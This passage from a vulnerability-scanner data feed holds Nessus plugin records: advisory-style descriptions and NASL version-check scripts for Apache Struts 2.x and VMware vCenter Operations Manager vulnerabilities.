vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:30", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.28.1. It is, therefore, affected by the following vulnerabilities :\n\n - An unspecified flaw exists, related to chained expressions, when Dynamic Method Invocation (DMI) is enabled. An unauthenticated, remote attacker can exploit this, via a crafted expression, to execute arbitrary code. (CVE-2016-3081)\n\n - A flaw exists in XSLTResult due to a failure to sanitize user-supplied input to the 'location' parameter when determining the location of an uploaded stylesheet.\n An unauthenticated, remote attacker can exploit this, via a request to a crafted stylesheet, to execute arbitrary code. (CVE-2016-3082)\n\n - A flaw exists that is triggered when dynamic method invocation is enabled while using the REST plugin. A remote attacker can exploit this, via a specially crafted expression, to execute arbitrary code.\n (CVE-2016-3087) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-04-28T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.28.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3087"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_28_1_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/90773", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90773);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2016-3081\", \"CVE-2016-3082\", \"CVE-2016-3087\");\n script_bugtraq_id(87327);\n\n script_name(english:\"Apache Struts 2.x < 2.3.28.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application that uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior\nto 2.3.28.1. It is, therefore, affected by the following\nvulnerabilities :\n\n - An unspecified flaw exists, related to chained\n expressions, when Dynamic Method Invocation (DMI) is\n enabled. An unauthenticated, remote attacker can exploit\n this, via a crafted expression, to execute arbitrary\n code. (CVE-2016-3081)\n\n - A flaw exists in XSLTResult due to a failure to\n sanitize user-supplied input to the 'location' parameter\n when determining the location of an uploaded stylesheet.\n An unauthenticated, remote attacker can exploit this,\n via a request to a crafted stylesheet, to execute\n arbitrary code. (CVE-2016-3082)\n\n - A flaw exists that is triggered when dynamic method\n invocation is enabled while using the REST plugin. A\n remote attacker can exploit this, via a specially\n crafted expression, to execute arbitrary code.\n (CVE-2016-3087)\n \nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-031.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-032.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-033.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-23281.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.28.1 or later. Alternatively,\napply the workarounds referenced in the vendor advisories.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts Dynamic Method Invocation Expression Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\n# Versions 2.3.20.3 and 2.3.24.3 are not affected\nif (app_info[\"version\"] == \"2.3.20.3\" || app_info[\"version\"] == \"2.3.24.3\")\n audit(AUDIT_INST_PATH_NOT_VULN, (\"Apache Struts 2 Application\"), app_info[\"version\"], app_info[\"path\"]);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"fixed_version\" : \"2.3.28.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:43", "description": "The version of vCenter Operations Manager installed on the remote host is prior to 5.8.2. It is, therefore, affected by the following vulnerabilities :\n\n - An error exists in the included Apache Tomcat version related to handling 'Content-Type' HTTP headers and multipart requests such as file uploads that could allow denial of service attacks. (CVE-2014-0050)\n\n - A security bypass error exists due to the included Apache Struts2 component, allowing manipulation of the ClassLoader via the 'class' parameter, which is directly mapped to the getClass() method. A remote, unauthenticated attacker can take advantage of this issue to manipulate the ClassLoader used by the application server, allowing for the bypass of certain security restrictions. Note that CVE-2014-0112 exists because CVE-2014-0094 was not a complete fix.\n (CVE-2014-0094, CVE-2014-0112)", "cvss3": {}, "published": "2014-07-07T00:00:00", "type": "nessus", "title": "VMware vCenter Operations Management Suite Multiple Vulnerabilities (VMSA-2014-0007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2018-08-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_operations"], "id": "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0007.NASL", "href": "https://www.tenable.com/plugins/nessus/76388", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76388);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\n\n script_cve_id(\"CVE-2014-0050\", \"CVE-2014-0094\", \"CVE-2014-0112\");\n script_bugtraq_id(65400, 65999, 67064);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n script_xref(name:\"IAVB\", value:\"2014-B-0090\");\n\n script_name(english:\"VMware vCenter Operations Management Suite Multiple Vulnerabilities (VMSA-2014-0007)\");\n script_summary(english:\"Checks version of vCenter Operations Manager.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vCenter Operations Manager installed on the remote host\nis prior to 5.8.2. It is, therefore, affected by the following\nvulnerabilities :\n\n - An error exists in the included Apache Tomcat version\n related to handling 'Content-Type' HTTP headers and\n multipart requests such as file uploads that could\n allow denial of service attacks. (CVE-2014-0050)\n\n - A security bypass error exists due to the included\n Apache Struts2 component, allowing manipulation of the\n ClassLoader via the 'class' parameter, which is directly\n mapped to the getClass() method. A remote,\n unauthenticated attacker can take advantage of this\n issue to manipulate the ClassLoader used by the\n application server, allowing for the bypass of certain\n security restrictions. Note that CVE-2014-0112 exists\n because CVE-2014-0094 was not a complete fix.\n (CVE-2014-0094, CVE-2014-0112)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000257.html\");\n # https://www.vmware.com/support/vcops/doc/vcops-582-vapp-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d46f364\");\n # https://www.vmware.com/support/vcops/doc/vcops-582-installable-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1fe3ac72\");\n # http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2081470\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be20e92d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vCenter Operations Manager 5.7.3 / 5.8.2 or later.\n\nAlternatively, the vendor has provided a workaround for the security\nbypass error.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_operations\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Operations Manager/Version\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Operations Manager/Version\");\nfix = NULL;\n\n# 0.x - 4.x / 5.0.x - 5.6.x\n# - update with alt. version(s) when patch is available\nif (version =~ \"^([0-4]|5\\.[0-6])($|[^0-9])\")\n fix = \"5.8.2\";\n\n# 5.7.x < 5.7.3\nelse if (version =~ \"^5\\.7\\.\" && ver_compare(ver:version, fix:'5.7.3', strict:FALSE) < 0)\n fix = \"5.7.3\";\n\n# 5.8.x < 5.8.2\nelse if (version =~ \"^5\\.8\\.\" && ver_compare(ver:version, fix:'5.8.2', strict:FALSE) < 0)\n fix = \"5.8.2\";\n\nif (!isnull(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Operations Manager', version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:41", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.28. It is, therefore, affected by the following vulnerabilities :\n - A cross-site scripting vulnerability exists due to improper validation of user-supplied input when using a single byte page encoding. A remote attacker can exploit this, via non-spec URL-encoded parameter value including multi-byte characters. (CVE-2016-4003)\n\n - A remote code execution vulnerability exists due to double OGNL evaluation of attribute values assigned to certain tags. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2016-0785)\n\n - A cross-site scripting vulnerability exists due to improper validation of user-supplied input when using the I18NInterceptor. A remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-2162)\n\n - A denial of service vulnerability exists in the Object-Graph Navigation Language (OGNL) component due to a flaw in the implementation of the cache for stored method references. A context-dependent attacker can exploit this to block access to arbitrary websites.\n (CVE-2016-3093)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2016-03-24T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.28 Multiple Vulnerabilities (S2-028) (S2-029) (S2-030) (S2-034)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785", "CVE-2016-2162", "CVE-2016-3093", "CVE-2016-4003"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_28_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/90153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90153);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-0785\",\n \"CVE-2016-2162\",\n \"CVE-2016-3093\",\n \"CVE-2016-4003\"\n );\n script_bugtraq_id(\n 85066,\n 85070,\n 86311,\n 90961\n );\n\n script_name(english:\"Apache Struts 2.x < 2.3.28 Multiple Vulnerabilities (S2-028) (S2-029) (S2-030) (S2-034)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.28. It is, therefore, affected by the following\nvulnerabilities :\n - A cross-site scripting vulnerability exists due to\n improper validation of user-supplied input when using\n a single byte page encoding. A remote attacker can \n exploit this, via non-spec URL-encoded parameter value\n including multi-byte characters. (CVE-2016-4003)\n\n - A remote code execution vulnerability exists due to\n double OGNL evaluation of attribute values assigned to\n certain tags. An unauthenticated, remote attacker can\n exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2016-0785)\n\n - A cross-site scripting vulnerability exists due to\n improper validation of user-supplied input when using\n the I18NInterceptor. A remote attacker can exploit this,\n via a specially crafted request, to execute arbitrary\n script code in a user's browser session. (CVE-2016-2162)\n\n - A denial of service vulnerability exists in the\n Object-Graph Navigation Language (OGNL) component due to\n a flaw in the implementation of the cache for stored\n method references. A context-dependent attacker can\n exploit this to block access to arbitrary websites.\n (CVE-2016-3093)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-028.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-029.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-030.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-034.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-2328.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.28 or later. Alternatively,\napply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0785\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.24.1\", \"fixed_version\" : \"2.3.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:35", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.2. It, therefore, is affected by multiple Dynamic Method Invocation (DMI) vulnerabilities as DMI is enabled by default. \n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.2 Dynamic Method Invocation Multiple Vulnerabilities (S2-019)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4316"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_2_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/117402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117402);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4316\");\n script_bugtraq_id(62587);\n\n script_name(english:\"Apache Struts 2.x < 2.3.15.2 Dynamic Method Invocation Multiple Vulnerabilities (S2-019)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple Dynamic Invocation Method vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.2. It, therefore, is affected by multiple\nDynamic Method Invocation (DMI) vulnerabilities as DMI is enabled\nby default. \n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-019\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.2 or later or follow the\nvendors instructions to disable DMI.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15.1\", \"fixed_version\" : \"2.3.15.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:19", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.3. It, therefore, is affected by a broken access control vulnerability which can be used to bypass security constraints.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.3 Broken Access Control Vulnerability (S2-018)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4310"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_3.NASL", "href": "https://www.tenable.com/plugins/nessus/117391", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117391);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-4310\");\n script_bugtraq_id(62584);\n\n script_name(english:\"Apache Struts 2.x < 2.3.15.3 Broken Access Control Vulnerability (S2-018)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a broken access control vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.3. It, therefore, is affected by a broken access\ncontrol vulnerability which can be used to bypass security constraints.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-018\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.3 or later or follow the\nvendors instructions to disable DMI.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4310\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15.2\", \"fixed_version\" : \"2.3.15.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-16T15:01:13", "description": "The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a a remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user input. An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.5.26 RCE (S2-061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17530"], "modified": "2023-06-16T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_5_26.NASL", "href": "https://www.tenable.com/plugins/nessus/143599", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143599);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/16\");\n\n script_cve_id(\"CVE-2020-17530\");\n script_xref(name:\"IAVA\", value:\"2020-A-0565-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Struts 2.x < 2.5.26 RCE (S2-061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Apache Struts installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts installed on the remote host is 2.x prior to 2.5.26. It is, therefore, affected by a \na remote code execution vulnerability in its OGNL evaluation functionality due to insufficient validation of user \ninput. An unauthenticated, remote attacker can exploit this to execute arbitrary commands on an affected host.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.5.26 or later. Alternatively, apply the workarounds as referenced in the vendor \n security bulletins.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17530\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Forced Multi OGNL Evaluation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an 